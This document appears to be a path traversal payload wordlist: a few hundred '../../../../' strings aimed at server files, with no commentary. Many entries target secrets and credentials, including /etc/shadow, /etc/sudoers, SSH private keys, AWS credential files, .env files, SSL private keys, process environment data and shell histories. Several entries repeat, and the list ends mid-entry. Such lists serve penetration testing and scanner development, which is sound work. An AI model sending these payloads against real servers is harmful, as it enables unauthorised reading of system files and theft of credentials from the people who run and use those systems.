../../../../etc/passwd
../../../../etc/hosts
../../../../etc/shadow
../../../../etc/httpd/conf/httpd.conf
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../proc/self/environ
../../../../proc/self/status
../../../../var/log/mysql/error.log
../../../../var/log/auth.log
../../../../var/log/secure
../../../../var/log/syslog
../../../../etc/ssl/certs/ca-certificates.crt
../../../../etc/mysql/my.cnf
../../../../var/log/php-fpm.log
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../var/www/html/index.php
../../../../var/www/html/config.php
../../../../etc/php.ini
../../../../var/www/html/.git/config
../../../../var/www/.htaccess
../../../../var/www/html/admin/config.php
../../../../var/www/html/.env
../../../../var/www/html/logs/debug.log
../../../../usr/lib/systemd/system/systemd.service
../../../../etc/apache2/apache2.conf
../../../../etc/rc.local
../../../../var/www/uploads/testfile.txt
../../../../etc/mtab
../../../../var/lib/mysql/mysql.sock
../../../../var/lib/mysql/ib_logfile0
../../../../var/lib/mysql/mysql_error.log
../../../../var/www/html/uploads/1.txt
../../../../usr/local/bin/cron
../../../../var/tmp/sensitive.log
../../../../etc/resolv.conf
../../../../etc/hostname
../../../../etc/fstab
../../../../var/www/html/js/app.js
../../../../var/log/fail2ban.log
../../../../var/cache/nginx/tmp_cache
../../../../etc/php/7.4/apache2/php.ini
../../../../etc/ssl/private/ssl-cert-snakeoil.key
../../../../var/log/mail.log
../../../../var/log/postgresql/postgresql.log
../../../../usr/local/apache2/htdocs/index.html
../../../../usr/share/wordlists/rockyou.txt
../../../../var/lib/dpkg/info/wordpress.list
../../../../etc/apt/sources.list
../../../../etc/cron.d/root
../../../../usr/lib/libc.so
../../../../var/www/html/uploads/photos/.env
../../../../var/log/auth.log
../../../../var/www/html/secret_files/file.php
../../../../home/user/.bash_history
../../../../home/user/.ssh/authorized_keys
../../../../home/user/.profile
../../../../etc/cron.daily/apt
../../../../usr/local/etc/php-fpm.conf
../../../../etc/sudoers
../../../../etc/ldap.conf
../../../../etc/hosts.allow
../../../../etc/hosts.deny
../../../../etc/xinetd.conf
../../../../var/log/clamav/clamd.log
../../../../var/www/html/backup/.env
../../../../var/www/html/assets/.gitignore
../../../../etc/issue
../../../../etc/mime.types
../../../../etc/environment
../../../../etc/apt/apt.conf.d/99my-custom-config
../../../../var/log/redis/redis-server.log
../../../../var/www/html/.git/HEAD
../../../../var/www/html/uploads/images/img.jpg
../../../../var/www/html/.bashrc
../../../../var/www/html/.git/objects/pack/pack-*.idx
../../../../var/www/.git/refs/heads/master
../../../../usr/share/jvm/java-11-openjdk-amd64/bin/java
../../../../etc/ldap/ldap.conf
../../../../etc/dovecot/dovecot.conf
../../../../var/log/mysql/mysql.log
../../../../var/log/apache2/access.log
../../../../etc/cron.monthly/apt
../../../../home/username/.aws/credentials
../../../../etc/httpd/conf.d/default.conf
../../../../var/log/postgresql/postgresql-*.log
../../../../var/www/html/uploads/.env
../../../../var/www/html/uploads/documents/private.docx
../../../../home/user/.gitmodules
../../../../var/cache/apt/archives/debian-archive-keyring.gpg
../../../../etc/nginx/nginx.conf
../../../../var/log/samba/log.smbd
../../../../etc/postgresql/12/main/postgresql.conf.sample
../../../../usr/lib/x86_64-linux-gnu/libc.so
../../../../home/user/.ssh/id_rsa
../../../../home/user/.mysql_history
../../../../var/www/html/assets/images/favicon.ico
../../../../var/log/mysql/mysql.log
../../../../etc/mysql/mysql.conf.d/mysqld.cnf
../../../../etc/init.d/mysql
../../../../var/log/cron
../../../../var/lib/postgresql/.psql_history
../../../../etc/php/7.4/cli/php.ini
../../../../usr/bin/openssl
../../../../etc/passwd- backup
../../../../var/log/docker.log
../../../../var/lib/mysql/mariadb.conf.d/50-server.cnf
../../../../home/user/.viminfo
../../../../var/log/sudo.log
../../../../etc/apache2/sites-enabled/000-default.conf
../../../../var/log/nginx/access.log
../../../../var/lib/php/sessions/sess_abcdef12345
../../../../etc/hostname
../../../../usr/local/etc/httpd/httpd.conf
../../../../var/log/mysql/mysql_error.log
../../../../etc/nginx/sites-available/default
../../../../var/lib/dpkg/lock-frontend
../../../../usr/bin/cron
../../../../etc/exim4/exim4.conf
../../../../var/log/php/error.log
../../../../etc/sudoers.d/admin
../../../../var/www/html/config/config.php
../../../../etc/crontab
../../../../var/lib/mysql/ibdata1
../../../../var/log/mail.err
../../../../var/www/.git/refs/heads/master
../../../../var/www/html/.env
../../../../home/user/.bash_logout
../../../../var/log/syslog
../../../../etc/ld.so.conf
../../../../etc/postgresql/9.5/main/postgresql.conf.sample
../../../../var/log/httpd/access_log
../../../../etc/pam.d/common-auth
../../../../var/www/html/js/libs/jquery.js
../../../../etc/selinux/config
../../../../var/cache/nginx/fastcgi_temp
../../../../etc/ssh/sshd_config
../../../../etc/ssl/certs/ssl-cert-snakeoil.pem
../../../../etc/nginx/sites-enabled/default
../../../../etc/ssh/ssh_config
../../../../etc/hosts
../../../../var/log/xrdp-sesman.log
../../../../etc/rc.local
../../../../var/log/clamav/clamd.log
../../../../var/www/html/uploads/.git
../../../../var/www/html/assets/js/app.js
../../../../etc/lvm/lvm.conf
../../../../usr/bin/perl
../../../../var/www/html/images/cat.png
../../../../home/user/.config/user-dirs.dirs
../../../../etc/ssl/private/ssl-cert-snakeoil.key
../../../../var/www/html/robots.txt
../../../../etc/apt/sources.list
../../../../var/log/syslog
../../../../var/log/mysql/mysqld.log
../../../../var/log/apt/history.log
../../../../etc/ssl/private/ssl-cert-snakeoil.key
../../../../var/log/mysql/error.log
../../../../etc/php5/apache2/php.ini
../../../../var/log/squid/access.log
../../../../var/log/ufw.log
../../../../etc/alternatives/gnome-terminal.wrapper
../../../../var/log/mongodb/mongodb.log
../../../../var/www/html/robots.txt
../../../../var/log/pm2/pm2.log
../../../../home/user/.profile
../../../../etc/apt/apt.conf.d/10periodic
../../../../var/log/syslog
../../../../var/log/daemon.log
../../../../var/www/html/uploads/pictures/photo.jpg
../../../../etc/letsencrypt/archive/hostname/fullchain1.pem
../../../../var/www/html/uploads/files/important.pdf
../../../../etc/rc.local
../../../../var/www/html/.git/refs/heads/master
../../../../home/user/.bashrc
../../../../var/www/html/assets/css/style.css
../../../../var/www/html/js/app.js
../../../../var/www/html/uploads/image.jpeg
../../../../var/www/.git/hooks/pre-commit
../../../../home/user/.config/nvim/init.vim
../../../../var/www/html/uploads/.gitignore
../../../../var/log/messages
../../../../var/www/html/.htaccess
../../../../var/www/html/uploads/photos/.env
../../../../var/lib/mysql/mysql.sock
../../../../var/www/html/uploads/.gitmodules
../../../../etc/pam.d/common-password
../../../../var/www/html/uploads/4.jpg
../../../../var/log/mysql/mysql-error.log
../../../../var/www/html/.git/objects/pack/pack-*.idx
../../../../etc/postgresql/9.5/main/postgresql.conf.sample
../../../../var/www/html/.env
../../../../var/log/mail.info
../../../../var/log/exim4/mainlog
../../../../etc/apache2/sites-enabled/000-default.conf
../../../../etc/sudoers.d/admin
../../../../var/www/html/index.php
../../../../etc/selinux/config
../../../../var/log/mongodb/mongodb.log
../../../../var/www/html/upload/.env
../../../../etc/php/7.4/apache2/php.ini
../../../../etc/sshd_config
../../../../var/log/fail2ban.log
../../../../
